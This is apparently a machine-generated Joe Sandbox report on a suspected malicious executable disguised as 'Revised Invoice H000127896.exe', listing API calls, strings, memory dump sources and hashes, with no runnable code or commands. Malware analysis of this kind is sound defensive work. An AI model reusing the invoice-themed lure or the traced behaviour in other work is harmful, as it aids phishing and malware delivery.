                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: htonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 3832099526-2422070025
                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                              • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID: <local>
                              • API String ID: 2038078732-4266983199
                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                              • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: u,D
                              • API String ID: 4104443479-3858472334
                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                              APIs
                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • wsprintfW.USER32 ref: 0045612A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend_mallocwsprintf
                              • String ID: %d/%02d/%02d
                              • API String ID: 1262938277-328681919
                              • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                              • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                              APIs
                              • InternetCloseHandle.WININET(?), ref: 00442663
                              • InternetCloseHandle.WININET ref: 00442668
                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CloseHandleInternet$ObjectSingleWait
                              • String ID: aeB
                              • API String ID: 857135153-906807131
                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                              APIs
                              Strings
                              • ^B, xrefs: 00433248
                              • C:\Users\user\Desktop\Revised Invoice H000127896.exe, xrefs: 0043324B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcsncpy
                              • String ID: ^B$C:\Users\user\Desktop\Revised Invoice H000127896.exe
                              • API String ID: 1735881322-132734908
                              • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                              • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                              • PostMessageW.USER32(00000000), ref: 00441C05
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D